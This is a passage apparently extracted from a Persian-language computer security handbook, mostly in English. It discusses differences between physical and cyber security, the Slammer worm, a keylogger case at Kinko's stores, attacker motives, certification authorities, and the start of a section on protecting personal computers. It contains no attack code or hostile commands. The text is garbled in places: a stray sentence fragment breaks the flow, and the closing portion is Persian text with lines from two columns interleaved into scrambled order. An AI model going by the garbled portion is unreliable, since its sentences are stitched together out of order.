The concepts of computer, network and data security in cyberspace are the same as in the real world, but the mechanisms for implementing the associated procedures are different. For example, to use the user accounts that grant access to information or services, we have a username [42] and a password [43] instead of physical or electronic keys, and instead of using sealed envelopes to convey information we can encrypt the data in transit so that it is unreadable to unknown parties.

Comparing the real world with cyberspace, we can see similar violations of reliability and confidentiality. Both can contain false addresses or forged signatures. In both spaces it is also possible to present false or misleading information. It is likewise possible to mislead people with information, whether by accident or on purpose, so that one cannot tell which information is important and verifiable. [44] Finally, in both spaces there is the possibility of unauthorized access to confidential information and of its use for illegal purposes.

Despite all these similarities, however, three major differences can be observed between the two spaces:

First: any kind of security breach in cyberspace can happen very quickly; that is, by the time you become aware of what has happened to your assets, it may already be far too late to prevent the damage. Not all attacks happen quickly, of course; some of them are observable while they are under way and, to come to fruition, take

42 Username
43 Password
44 The captain of the famous ship Titanic used an early radio to communicate between ship and shore. The radio operator, who was on his first sea voyage, was receiving so many personal messages that one important message, a warning about a large iceberg in the ship's path, was not recognized as important and worth following up. The result was that the ship struck the iceberg and sank a few hours later.
a great deal of time. The lesson to be drawn from this is that security and deterrent measures must be capable enough to detect a security breach while the offence is taking place or after it.

Consider the following reports on the Slammer worm, which severely disrupted the Internet in early 2003. As a result of this worm's activity, many countries on all five continents were infected, and the bulk of the damage fell on developing countries:

Slammer (sometimes also called Sapphire) is the fastest computer worm ever released in the history of computing. As it began to spread across the Internet, more than 90% of vulnerable hosts [45] were infected within 10 minutes, disrupting financial transactions and the transportation operations of government institutions, and leaving no room for human response...

Before 5:30 UTC [46] on Saturday, 25 January 2003, Slammer, by exploiting a buffer overflow vulnerability [47], broke into Internet-connected computers running Microsoft SQL Server or Microsoft SQL Desktop Engine (MSDE) 2000 and quietly set about infecting all host computers. David Litchfield [48] discovered this vulnerability in July 2002, and Microsoft had released a patch to fix it before the Slammer worm appeared. [49]

According to official reports, the worm used this vulnerability to infect at least 75 thousand hosts (the real number being, of course, far higher), severely disrupting the Internet and causing unforeseen consequences such as cancelled airline flights, interference with elections, and ATM failures. [50]

Second: you do not need to be physically present at a location in order to compromise security in cyberspace. This means that, for example, someone in Europe can compromise the computers of a target in India as easily as someone in India who is only a street's width away from that target. A security threat in cyberspace can originate anywhere on the network and be directed at a known, specific target; the target may also have been chosen at random. These dangerous threats force us to change the way we think about security. One could say it is of no value for the Digital Millennium copyright regulation to declare the design of lock-breaking software illegal, because national and international copyright committees are at present still busy drawing up enforcement approaches for this and other matters related to data protection. [51]

Third: cyberspace has created a powerful but complex environment in which the role of providing security falls to several players. For example, if you are a customer of an ISP, you have various ways of protecting yourself and your personal computer, but you cannot control the security policies of the ISP you use or how they are implemented. Nor can you control your customers' software, even if you work closely with their systems. You must therefore adopt a protection strategy for your assets, because

45 Hosts
46 Universal Time Coordinated
47 Buffer Overflow Vulnerability
48 David Litchfield
49 http://www.microsoft.com/security/slammer.asp
50 Moore, Paxson, Savage, Shannon, Staniford and Weaver, "Inside the Slammer Worm," IEEE Security and Privacy, Vol. 1, No. 4, July/August 2003, pp. 33-39.
51 For recent views on this document you can consult the following references:
U.S. Copyright Office Digital Millennium Copyright Act Study: http://www.copyright.gov/reports/studies/dmca/dmca_study.html
DMCA: http://www.copyright.gov/legislation/hr2281.pdf
you know that connecting to the outside world means you cannot neutralize all of the network's vulnerabilities.

What are the likely risks in cyberspace? If you have taken no security considerations into account, some of the outcomes that may follow are:

Destruction of information - the data stored on your computer may be deleted. It is usually possible to recover it, but the process will be time-consuming and probably incomplete. If you are a government institution, your operations may be disrupted during this period.

Theft of information and breach of privacy - you may learn of the theft immediately or only after a delay, and that is an entirely separate matter from finding out who has obtained your data, what information they hold, or what they will do with it. If a large amount of your personal information has been stolen, the thief very probably holds your key information, and this can have unknown and somewhat dangerous consequences.

Breach of information integrity - the information on a computer may be altered and tampered with without your knowledge. Depending on the kind of information you hold, the results of this tampering may be short-lived or long-term. If the data includes financial records, customer information, order status or employee files, the consequences of a breach of its integrity can be very costly and damaging.

Breach of network integrity through other systems and networks - although in this case you have not been attacked directly, other computers that you have had access to may be attacked, and this can affect you as well. If you are, say, a financial and credit institution, you will then be unable to complete your financial transactions during the data recovery period.

Keystroke logging - hidden software can be installed on your computer that records your keystrokes and sends them to another computer. This can compromise access to external resources, such as access to a protected web server [52] or an e-mail server, financial transfers, or the receipt of confidential information. In this situation the thief can obtain your authentication tokens [53], credit card number and passwords and use them later for personal gain.

Denial of access [54] - you may be deprived of access to your own information even though it has not been deleted. For example, your information may turn up in encrypted form, with only the attacker holding the decryption key.

The cost of successfully recovering from any of these attacks is considerable, and in some cases recovery appears impossible. If you run an advertising medium that depends heavily on its electronic data resources, a destructive attack can bankrupt your organization. Note that the Slammer worm infected systems on which the patch issued by Microsoft had not been installed.

One security intrusion that operated successfully for more than a year illustrated new methods by which security in cyberspace can be compromised:

"Associated Press (New York) - For more than a year, Juju Jiang [55] recorded what people typed at the Internet terminals [56] in Kinko's stores [57] in New York, without their knowledge. Jiang had secretly installed software in at least fourteen Kinko's stores that could record

52 Web Server
53 Authentication Tokens
54 Denial of Access
55 Juju Jiang
56 Terminals
57 Kinko's Stores
people's keystrokes. Over the year it was in operation, this software captured more than 450 usernames and passwords, which he used to access and even open online bank accounts.

The case, which early this month, following Jiang's arrest, resulted in a penalty being set for him, exposes the dangers of using public Internet terminals in Internet cafés, libraries, airports and other establishments. Neel Mehta [58], a research engineer at Internet Security Systems [59], warns: "Use your common sense when using any public terminal. For many everyday communications, such as connecting to the web, you may not run into a problem, but think a little before doing anything that could be sensitive." Jiang was arrested when, according to court records, he used one of the stolen passwords to access a computer equipped with the GoToMyPC software. This software lets people access their own computer remotely from anywhere. The person on whose computer GoToMyPC was installed was at home at the time of the offence and suddenly noticed the cursor on his screen start to move and files open by themselves. He then saw a bank account being opened and his name being entered in an online shopping service. Jiang, who is awaiting the court's ruling, finally confessed on 14 February 2001 to installing hidden keystroke-logging software in Kinko's stores. [60]

This book is a guide to user security in both the home and the business environment, and it therefore contains extensive information on security topics such as risks, the consequences of attacks, methods of protecting computers, networks and data, and the policies that need to be examined before an effective security strategy is implemented. The ultimate aim of this book is not to keep users away from the resources offered in new digital environments, but to empower them to enjoy this new world in a safe and secure way. In short, the purpose of publishing this book is to develop a realistic and deep understanding of the nature of existing security problems, in order to reduce vulnerabilities and increase the strengths of information and communication technology.

What Motivates Security Saboteurs?

In real life there are many motives for committing criminal acts against a person or organization. One of the main reasons is the offender's revenge on someone he believes has harmed him, or obtaining money.

The same kinds of offences exist in cyberspace, but offending there is of a different nature. For one group of people, commonly called "saboteurs", who are able to break into people's user accounts or who harm others for fun and amusement, cyberspace is a challenging environment. In other words, they regard the ability to break into user accounts, databases and network equipment as a point of pride. Behaviour like this is very rare in the real world.

Saboteurs usually regard their activities as "victimless crimes". Their argument is: when a user account or database is broken into but nothing is changed or stolen, what harm has been done to anyone? In fact these people pay no attention to the legal implications and consequences of what they do, and do not care about the feeling of insecurity that their activities cause in their victims. The real-world equivalent of this behaviour would be someone entering your home and being able to do so again whenever they wished. You would certainly find that intolerable.

Unfortunately, the Internet is a great help to those who violate security. Some saboteurs have intrusion tools that allow even novice intruders to exploit certain vulnerabilities successfully. Such tools are usually posted to very well-known Usenet newsgroups, where all sorts of people can find them and

58 Neel Mehta
59 Internet Security Systems
60 Associated Press Bulletin, July 23, 2003
put them to use. While many of these tools may be harmless, no one can ever be sure exactly what the effects of using any one of them will be. In addition, by making changes to some of these so-called harmless tools, it is possible to damage the computers and user accounts accessed through them. One example is given below:

Document CA-203-18 of the computer security emergency response center documents the latest Windows hole, and CNet has reported that exploiting this vulnerability to break into Windows paves the way for the lightning-fast emergence and severe attack of another worm:

Security researchers have warned that a group of hackers has released a program designed to exploit a major Windows flaw, opening the way for a large attack by the end of this week. The warning was issued on Friday, after Chinese hackers from the X Focus security group published, to several security centers around the world, the text of a program skillfully designed to break into computers running the Windows operating system.

The X Focus group's program exploits a flaw in Microsoft's operating system and allows intruders to break into a system remotely. Several experts have described this flaw as the biggest ever found in Windows. [61]

The ever-growing number of attacks carried out by relatively unskilled people is also a long and continuing story.

Not all security breaches are specific to computers and the Internet, of course. ATMs have also been used to steal confidential information. In one case (in the state of Connecticut [62] in the United States), thieves installed a device resembling an ATM in a shopping centre. When people entered their card and PIN to withdraw money from this machine, the fake device stored the PINs, making later unauthorized access to these accounts very easy; but because it had no connection to real credit centres, it could not complete the financial operation. In another case thieves used ATMs in such a way that money could actually be transferred, but some time later they carried out thefts using the recorded information.

Although most of the offences observed in the cyber world are committed by individuals, organizations and institutions are also capable of abusing the characteristics of this space to achieve their organizational goals. Organized crime may take the form of tampering with the Internet to obtain the results they want, but it can also lead to crimes being committed against others. Some organizations may wish to manipulate the result of an opinion poll, or even an election, to reach their desired outcome. Some institutions have already invested heavily in this and may be able to keep it up vigorously for a long time.

Clearly the potential benefits of the new digital age are countless. It is very important that we protect these benefits by securing our physical environment, infrastructure, computers, communication lines and information resources. The first step in doing so is to reach an adequate and correct level of understanding of the technology, which can help us make sensible decisions about how to reach a desirable level of security. Many of us have several roles in this regard: we may use these resources as ordinary users, be responsible for the digital systems and services in an organization, or be interested in working with government to implement policies that support security.

In each of these roles all of us are responsible for achieving a desirable level of security. Unfortunately, security in a complex environment is usually only as strong as the security of that environment's weakest component; we must therefore make sure that the components of the environment we control are strong enough that even the weakest of

61 CNet News.com, July 25, 2003
62 Connecticut State
them is also capable of defending against existing threats.

is essential, but it needs an alternative approach for managing customers' purchase requests; a method which, if without

we use for a person, a process, or an organization; for example, we use the agreement between our current observations and our earlier experience and knowledge. When information is exchanged in cyberspace, most of the non-verbal cues of communication are lost. When we receive an e-mail or read a web page, we cannot always tell whether the information is accurate, or whether checking it would show it to be incorrect. Nor do we know whether any errors are the result of carelessness or of deliberate attempts to deceive us. In the absence of information we do not even know whether the author of a message is the person he or she claims to be.

Deception certainly occurs in the real world as well, but establishing the truth is usually easier when people are physically present and places really exist. Fortunately, certification authorities [65] have done a great deal to help with this dimension of security in the cyber world. These authorities formally issue certificates to identify individuals and organizations. The concept also exists in the real world: if you hold a national passport, it means that a country's government has confirmed your identity, so the passport is a token you can use to authenticate yourself. Similarly, if you hold a motor vehicle licence, it means that a national or regional government agency has issued you a permit that both confirms your identity and authorizes you to drive a vehicle. Companies that provide credit card services also vouch for you by issuing credit cards. Your employer or school may likewise vouch for you through an identity card, and that card may give you access to particular services intended for the employees or students of a particular domain.

Clearly the number of certification authorities in the real world is small. In general, each of these authorities has a specific purpose in vouching for you. The thoroughness of identity verification varies from one authority to another; some may require full proof of your identity, while others may accept whatever you state.

Certification authorities in the cyber world share these characteristics. Multiple levels of identity verification are established for different degrees of assurance, and each certificate is valid only at its own level. That is why, although it might seem that a single certification authority would be enough to serve every purpose, several certification authorities exist in the virtual world. In addition, by using electronic certificates [66], these certificates can be signed electronically, giving assurance that a transmitted certificate is correct and genuine. These certification systems are more robust than the empirical and intuitive methods used in the real world. In the digital world, more robust methods have to be used in order to establish the trust needed to support commercial transactions and financial transfers over electronic networks.

Governments have an important role in ensuring that suitable mechanisms exist for new trust models to work and to be used. The ability of small and medium-sized organizations to transact electronically depends on this trust. In some countries governments believe that government agencies should act as certification authorities, while in others governments hold that the role of certification authority should be left to the private sector. Whatever the implementation details, the purpose of establishing these authorities is clear. Government policy can facilitate assurance mechanisms so that individuals, organizations and their individual users are able to take part in the electronic commerce of other countries as well.
Chapter 1. Introduction
Chapter 2. Understanding Security Concepts
Chapter 3. Computer and Data Security
Chapter 4. Operating System and Application Software Security
Chapter 5. Malicious Software
Chapter 6. Network Service Security
Chapter 7. Tools for Improving Security
Chapter 8. Platform-Specific Notes
Appendix 1. Introduction to Encoding and Encryption
Appendix 2. TCP/IP
Appendix 3. Glossary of Technical Terms
Chapter One
Introduction

Part Two concentrates on the security of individual computer users, from beginners to experts, and the first thing that needs to be explained in this regard is how to protect personal computers.

A computer can be used securely, but doing so requires knowledge, shrewdness and great care. The language used in this discussion sometimes involves unfamiliar concepts. Some of the terms and definitions are given in the appendix at the end of this part, and some are set out in full in Appendix 1 of the book.

The first step in setting out a sound security strategy is to define what "proper use" of personal computers and "protecting" them mean. If this is what you are after too, make sure that:

• your data and programs are changed or deleted only when you want them to be;
• computer programs behave as their designer or programmer intended (apart from software bugs, whose presence in programs is unintentional);
• no one can use your data, computer or network without your permission;
• your computer does not unintentionally spread virus-infected files;
• no one is able to observe the changes you make on your computer;
• no one is able to get at your data, whether on wireless or wired networks;
• no one is able to steal your username [1] and password [2] on the systems or websites you access;
• if you enter your credit card number or bank account details over the Internet, the data will be completely secure (you will, of course, have no control over what happens at the other end of the connection);
• and so on.

If security is neglected on personal computers, a variety of consequences can follow: they may be a nuisance that costs nothing, or they may impose heavy costs and take up a great deal of time. Where protecting computers is regarded as a person's job, the resulting problem may put that person's position at risk. In every case one should assess the likelihood of risk, adopt the necessary security plan, and carry it out. The details presented here on information technology security make it possible to control all aspects of personal computer security.

If the guidance given in this book is also followed, the likelihood of risk can be reduced to an acceptable level and the best use made of the changing world of information technology.

Naturally, covering every aspect of personal computer security would take hundreds of pages, but readers generally have little appetite for reading large volumes of material. This text presents a summary of the information users need in order to understand and implement personal computer security. The references listed in the appendices, including electronic resources, relevant organizations and printed documents, can also be of help and encourage the user to read further about information technology security.

1 Username
2 Password
Part Two: IT Security and Individual Users
• Time and cost constraints - some people imagine that security measures in design, coding and testing during the software development process are extremely costly and take a great deal of time.
• Programmers' lack of discipline - in programming work the same mistakes are repeated many times over and give rise to security flaws.
• Criminals' creativity - humans are creative beings, and motivated people will always find a way to overcome security barriers and to discover the mistakes that lead to security flaws.
• Users' low level of awareness - ordinary users (the victims of security violations) are naturally unaware of the threats around them and therefore do not look for suitable ways of ensuring the security of their data and systems.
• Victims' unrealistic outlook - some users are aware of security issues but do not take them seriously, because they assume that no attack will be made against them.

Assessing Threats and Their Costs

To appreciate the importance of security, a few questions need to be answered. First assume that the following have happened, and then try to assess the likely consequences of each

web, online purchases [4], important work reports and coursework that is worth 50% of your marks for the current term.

...someone watches, moment by moment, everything you do on your computer and remembers it; learns your credit card number when you enter it; knows about your browsing of various websites; and, when you connect to a website or to systems, is able to steal your username and password.

...your computer breaks down while you are working on an important project in which time is critical.

...a destructive computer virus is sent to all of your friends whose names are recorded in your computer's address book.

...you receive your telephone bill and see that the amount is more than your monthly salary, when you are sure you have not used the telephone that much.

...a credit card statement is sent to you and you see that it is not yours, but the bank tries to convince you that you did use your card to that extent, and has evidence for its claim.

The key questions that must be answered in each case are as follows:
ﺩﺭﺻﻮﺭﺕ ﻭﻗﻮﻉ ،ﺁﻳﺎ ﺍﻣﻜﺎﻥ ﺗﺮﻣﻴﻢ ﻭﺟﻮﺩ ﺩﺍﺭﺩ؟ • ﻧﻤﺎﻳﻴﺪ ﻭ ﺩﺭ ﻫﺮ ﻣﻮﺭﺩ ﺑـﻪ ﭼﻨـﺪ ﺳـﺆﺍﻝ ﻛﻠﻴـﺪﻱ ﻛـﻪ ﺩﺭ ﺍﺑﺘـﺪﺍﻱ
ﺍﻳﻦ ﺭﺧﺪﺍﺩ ﭼﻘﺪﺭ ﺯﻣﺎﻥ ﺑﻪ ﺧﻮﺩ ﺍﺧﺘﺼﺎﺹ ﻣﻲﺩﻫﺪ؟ • ﺻﻔﺤﻪ ﺑﻌﺪﻱ ﺁﻣﺪﻩ ﭘﺎﺳﺦ ﺩﻫﻴﺪ.
ﭼﻪ ﻣﻘﺪﺍﺭ ﻫﺰﻳﻨﻪ ﺻﺮﻑ ﺁﻥ ﻣﻲﺷﻮﺩ؟ •
ﭼﻪ ﺍﺗﻔﺎﻗﻲ ﺧﻮﺍﻫﺪ ﺍﻓﺘﺎﺩ ﺍﮔﺮ...
ﭼﮕﻮﻧﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺳﺎﺯﻣﺎﻥ ﺷﻤﺎ ﺭﺍ ﺗﺤﺖ ﺗﺄﺛﻴﺮ ﻗﺮﺍﺭ ﺩﻫﺪ؟ •
ﭼﻪ ﻫﺰﻳﻨﻪﻫﺎﻱ ﺟﺎﻧﺒﻲ ﺩﺭ ﺑﺮ ﺩﺍﺭﺩ؟ )ﻣﺜ ﹰ
ﻼ ﺩﺭ ﺷﺮﺍﻳﻂ ﻧﺎﻣﻨﺎﺳﺐ • ...ﺷﺨﺼﻲ ﺑﻪ ﺧﺎﻧﻪ ﻭ ﻳﺎ ﻣﺤﻞ ﻛﺎﺭ ﺷﻤﺎ ﺣﻤﻠﻪ ﻛﻨﺪ ﻭ ﺭﺍﻳﺎﻧﺔ ﺷـﻤﺎ
ﻭ ﺩﺭ ﻏﻴﺎﺏ ﻣﺴﺌﻮﻝ ﻣﺮﺑﻮﻃﻪ( ﺭﺍ ﺑﺪﺯﺩﺩ ﻭ ﻋﻼﻭﻩ ﺑﺮ ﺁﻥ ﺩﻳﺴﻚ ﻧﺴﺨﺔ ﭘﺸﺘﻴﺒﺎﻥ ﺷﻤﺎ ﻛﻪ ﻣﻤﻜﻦ
ﺍﺳﺖ ﺩﺭ ﺁﻥ ﻧﺰﺩﻳﻜﻲ ﺑﺎﺷﺪ ﺭﺍ ﻧﻴﺰ ﺑﺎ ﺧﻮﺩ ﺑﺒﺮﺩ.
ﺗﻤﺎﻣﻲ ﺍﻳﻦ ﻣﻮﺍﺭﺩ ﺍﻫﻤﻴﺖ ﻣﻮﺿﻮﻉ "ﺍﻣﻨﻴـﺖ ﺭﺍﻳﺎﻧـﻪ" ﺭﺍ ﻣـﺸﺨﺺ
ﻣﻲﻛﻨﻨﺪ .ﺍﻛﻨﻮﻥ ﻛﻪ ﻣﺘﻮﺟﻪ ﺷﺪﻩﺍﻳﺪ ﺍﻣﻨﻴﺖ ﻣﻮﺿﻮﻋﻲ ﺑﺴﻴﺎﺭ ﻣﻬﻢ ...ﻫﻤﺔ ﺩﺍﺩﻩﻫﺎﻱ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﭘﺎﻙ ﺷﻮﻧﺪ.
ﺍﺳﺖ ،ﮔﺎﻡ ﺑﻌﺪﻱ ﺑﺮﺭﺳﻲ ﻳﻚ ﻃﺮﺡ ﻣﻨﺎﺳﺐ ﺍﻣﻨﻴﺘﻲ ﺑﺮﺍﻱ ﺍﻳﻤـﻦ ...ﻳﻚ ﻧﺴﺨﻪ ﺍﺯ ﺗﻤﺎﻡ ﺩﺍﺩﻩﻫﺎﻱ ﺷﻤﺎ ﺑﻪ ﺳﺮﻗﺖ ﺭﻭﺩ .ﺍﻳﻦ ﺩﺍﺩﻩﻫـﺎ
ﺷﺪﻥ ﻣﻲﺑﺎﺷﺪ: ﻣﻤﻜﻦ ﺍﺳﺖ ﺷﺎﻣﻞ ﻣﻮﺍﺭﺩﻱ ﺑﺎﺷﻨﺪ ﺍﺯ ﻗﺒﻴﻞ :ﺍﻃﻼﻋـﺎﺕ ﺣـﺴﺎﺏ
ﺑﺎﻧﻜﻲ ،ﻓﻬﺮﺳﺖ ﻧﺎﻣﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰﻫﺎﻱ ﻋﺒـﻮ ﹺﺭ ﭘﺎﻳﮕﺎﻫﻬـﺎﻱ
ﻓﺮﺳﺘﺎﺩﻩ ﺑﺎﺷﺪ ،ﺑﺎﻳـﺪ ﺩﺭ ﻣـﻮﺭﺩ ﺑـﺎﺯﻛﺮﺩﻥ ﻭ ﻳـﺎ ﺑـﺎﺯ ﻧﻜـﺮﺩﻥ ﺁﻥ ﺍﻳﻤﻦ ﺷﺪﻥ ﺑﺮﺍﻱ ﺷﻤﺎ ﭼﻪ ﻫﺰﻳﻨﻪﺍﻱ ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ؟ •
ﺗﺼﻤﻴﻢ ﮔﻴﺮﻱ ﻛﻨﻴﺪ .ﺍﻳﻦ ﻣﻴﺰﺍﻥ ﺍﺣﺘﻴﺎﻁ ﺩﺭ ﺯﻧﺪﮔﻲ ﺭﻭﺯﻣـﺮﻩ ﻧﻴـﺰ ﭼﻪ ﺯﻣﺎﻧﻲ ﺭﺍ ﺑﻪ ﺧﻮﺩ ﺍﺧﺘﺼﺎﺹ ﻣﻲﺩﻫﺪ؟ •
ﺿﺮﻭﺭﻱ ﺍﺳﺖ .ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﺑﺴﻴﺎﺭ ﺧﻮﺷـﺎﻳﻨﺪ ﺧﻮﺍﻫـﺪ ﺑـﻮﺩ ﺍﮔـﺮ ﺗﺎ ﭼﻪ ﺣﺪ ﻣﺸﻜﻞﺁﻓﺮﻳﻦ ﺧﻮﺍﻫﺪ ﺑﻮﺩ؟ •
ﺑﺘﻮﺍﻧﻴﺪ ﻫﺮ ﺯﻣﺎﻥ ﻛﻪ ﺑﺨﻮﺍﻫﻴﺪ ﺍﺯ ﺧﻴﺎﺑﺎﻥ ﻋﺒـﻮﺭ ﻛﻨﻴـﺪ؛ ﺍﻣـﺎ ﻻﺯﻡ ﺁﻳﺎ ﻛﺎﺭﻫﺎﻳﻲ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛـﻪ ﺑـﺎ ﺍﺟـﺮﺍﻱ ﻃـﺮﺡ ﺍﻣﻨﻴﺘـﻲ، •
ﺍﺳﺖ ﺑﺮﺍﻱ ﻋﺒﻮﺭ ﺍﺯ ﺧﻴﺎﺑﺎﻥ ﻣﺮﺍﻗﺐ ﺁﻣﺪ ﻭ ﺭﻓﺖ ﻣﺎﺷﻴﻨﻬﺎ ﺑﺎﺷﻴﺪ. ﺍﻧﺠﺎﻡ ﺁﻧﻬﺎ ﻣﺸﻜﻞ ﻭ ﻳﺎ ﻏﻴﺮ ﻣﻤﻜﻦ ﺷﻮﺩ؟
ﺁﻳﺎ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﻪ ﺗﻨﻬـﺎﻳﻲ ﻃـﺮﺡ ﺭﺍ ﺍﺟـﺮﺍ ﻛﻨﻴـﺪ ﻳـﺎ ﺑـﺮﺍﻱ •
ﺁﻳﺎ ﻛﺎﺭﻫﺎﻳﻲ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛﻪ ﺑﺎ ﺍﺟﺮﺍﻱ ﻃﺮﺡ ﺍﻣﻨﻴﺘـﻲ، ﺍﺟﺮﺍﻱ ﺁﻥ ﺑﻪ ﻛﻤﻚ ﺩﻳﮕﺮﺍﻥ ﻧﻴﺎﺯ ﺩﺍﺭﻳﺪ؟
ﺍﻧﺠﺎﻡ ﺁﻧﻬﺎ ﻣﺸﻜﻞ ﻭ ﻳﺎ ﻏﻴﺮ ﻣﻤﻜﻦ ﺷﻮﺩ؟
ﺑﺨﺶ ﺩﻭﻡ
ﺁﻳﺎ ﻣﻲ ﺗﻮﺍﻧﻴﺪ ﺑﻪ ﺗﻨﻬﺎﻳﻲ ﻃﺮﺡ ﺭﺍ ﺍﺟﺮﺍ ﻛﻨﻴﺪ ﻳﺎ ﺑـﺮﺍﻱ ﭼﻪ ﺯﻣﺎﻧﻲ ﺭﺍ ﺑﻪ ﺧﻮﺩ ﺍﺧﺘﺼﺎﺹ ﻣﻲﺩﻫﺪ؟
ﺍﺟﺮﺍﻱ ﺁﻥ ﺑﻪ ﻛﻤﻚ ﺩﻳﮕﺮﺍﻥ ﻧﻴﺎﺯ ﺩﺍﺭﻳﺪ؟
ﻣﺴﻠﻤﹰﺎ ﺍﺟﺮﺍﻱ ﻃﺮﺡ ﺍﻣﻨﻴﺘﻲ ﻭ ﺩﻧﺒﺎﻝ ﻛﺮﺩﻥ ﺁﻥ ﺯﻣﺎﻧﻲ ﺭﺍ ﺑﻪ ﺧـﻮﺩ
ﻓﺮﺽ ﺑﺮ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺷﻤﺎ ﻣﺴﺌﻮﻝ ﺗﻤﺎﻡ ﺍﺑﻌﺎﺩ ﺍﻣﻨﻴﺘﻲ ﺳﻴـﺴﺘﻢ ﺍﺧﺘﺼﺎﺹ ﻣﻲﺩﻫﺪ ،ﺍﻣﺎ ﻣﻴﺰﺍﻥ ﺍﻳﻦ ﺯﻣـﺎﻥ ﺯﻳـﺎﺩ ﻧﻴـﺴﺖ .ﺩﺭ ﺍﻳـﻦ
ﺧﻮﺩ ﻫﺴﺘﻴﺪ ،ﺍﻣﺎ ﺩﺭ ﻋﻤﻞ ﺷﺎﻳﺪ ﺑﻬﺘﺮ ﺑﺎﺷﺪ ﻛﻪ ﺑﺮﺍﻱ ﺑﻬﺘﺮ ﺍﻧﺠـﺎﻡ ﺧﺼﻮﺹ ﻻﺯﻡ ﺍﺳﺖ ﻛﻪ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﻨﺎﺳﺐ ﺭﺍ ﻧﺼﺐ ﻛﻨﻴـﺪ ﻭ
ﺷﺪﻥ ﻛﺎﺭ ﺍﺯ ﺩﻳﮕﺮﺍﻥ ﻧﻴﺰ ﻛﻤﻚ ﺑﮕﻴﺮﻳﺪ. ﺳﭙﺲ ﻭﻇﺎﻳﻒ ﺣﻔﺎﻇﺘﻲ ﻣﻌﻤﻮﻝ ﺭﺍ ﻃﺒﻖ ﻳﻚ ﺭﻭﺍﻝ ﻣﺸﺨﺺ ﺑﻪ
ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ ﻭ ﻭﺻـﻠﻪﻫـﺎﻱ ٧ﺍﺭﺍﺋـﻪﺷـﺪﻩ ﻛـﻪ • ﺍﻧﺠﺎﻡ ﺭﺳﺎﻧﻴﺪ.
ﺑﺨﺶ ﻣﻬﻤﻲ ﺍﺯ ﻓﺮﺁﻳﻨﺪ ﺍﻳﺠﺎﺩ ﺍﻣﻨﻴـﺖ ﺍﺳـﺖ ﺑـﻪ ﭘﻬﻨـﺎﻱ
ﺗﺎ ﭼﻪ ﺣﺪ ﺑﺮﺍﻱ ﺷﻤﺎ ﻣﺸﻜﻞ ﺁﻓﺮﻳﻦ ﺧﻮﺍﻫﺪ ﺑﻮﺩ؟
ﺑﺎﻧﺪ ٨ﺷﻤﺎ ﺑﺴﺘﮕﻲ ﺩﺍﺭﺩ .ﻣﺴﻠﻤﹰﺎ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺑـﺮﺍﻱ ﻛـﺴﻲ
ﻛﻪ ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ ﻣﺘﺼﻞ ﺷﺪﻩ ﻭ ﺳﺮﻋﺖ ﺍﺭﺗﺒﺎﻁ ﻭﻱ ﺩﺭ ﺣﺪ ﻣﻴﺰﺍﻥ ﻣﺸﻜﻼﺕ ﺑﻪ ﺩﻳﺪﮔﺎﻩ ﺷـﻤﺎ ﺑـﺴﺘﮕﻲ ﺩﺍﺭﺩ .ﺑﺎﻳـﺪ ﺩﺭ ﻣـﻮﺭﺩ
ﻣﮕﺎﺑﺎﻳﺖ ﺍﺳﺖ ﻣﺸﻜﻠﺴﺎﺯ ﻧﻴـﺴﺖ؛ ﻭﻟـﻲ ﭘﻬﻨـﺎﻱ ﺑﺎﻧـﺪ ﺩﺭ ﺁﻧﭽﻪ ﺍﻧﺠﺎﻡ ﻣﻲﺩﻫﻴﺪ ﺁﮔﺎﻫﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻭ ﻫﺮﮔـﺰ ﻧﺒﺎﻳـﺪ ﻓﻜـﺮ
ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﺑﻪ ﺷﺪﺕ ﻣﺤـﺪﻭﺩ ﻭ ﺑـﺴﻴﺎﺭﻱ ﻛﻨﻴﺪ ﻛﻪ ﻫﺮ ﭼﻴﺰﻱ ﺩﺭ ﻧﻮﻉ ﺧﻮﺩ ﻭﺍﺟﺪ ﺍﻣﻨﻴﺖ ﺍﺳﺖ .ﺑﺮﺍﻱ ﻣﺜـﺎﻝ
ﺍﻭﻗﺎﺕ ﭘﺮﻫﺰﻳﻨﻪ ﻭ ﮔﺮﺍﻧﻘﻴﻤﺖ ﺍﺳﺖ ﻭ ﺍﺗﺼﺎﻝ ﺑﻪ ﺍﻳﻨﺘﺮﻧـﺖ ﺍﮔﺮ ﺷﺨﺼﻲ ﺩﺭ ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺧﻮﺩ ﺑـﺮﺍﻱ ﺷـﻤﺎ ﺿـﻤﻴﻤﻪﺍﻱ
ﺩﺭﺩﺳﺮﻫﺎﻱ ﺍﻧﺠﺎﻡ ﻛﺎﺭ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻪ ﺍﻳﻦ ﻧﺘﻴﺠـﻪ ﺑﺮﺳـﻴﺪ ﻛـﻪ ﺍﺯ ﻃﺮﻳﻖ ﺗﻠﻔﻦ ﺑﺮﺍﻱ ﺑﺎﺯﻩﻫﺎﻱ ﻃﻮﻻﻧﻲﻣﺪﺕ ﻫﻢ ﻣﻘـﺮﻭﻥ
ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺑﻌﻀﻲ ﺍﺯ ﺧﻄﺮﺍﺕ ﺣـﺪﺍﻗﻞ ﺩﺭ ﺯﻣـﺎﻥ ﺣﺎﺿـﺮ ﺿـﺮﻭﺭﻱ ﺑﻪ ﺻﺮﻓﻪ ﻧﻴﺴﺖ .ﺑﻪ ﻫﻤﻴﻦ ﺩﻟﻴﻞ ﺩﺭ ﭼﻨﻴﻦ ﺷﺮﺍﻳﻄﻲ ﺑﻬﺘﺮ
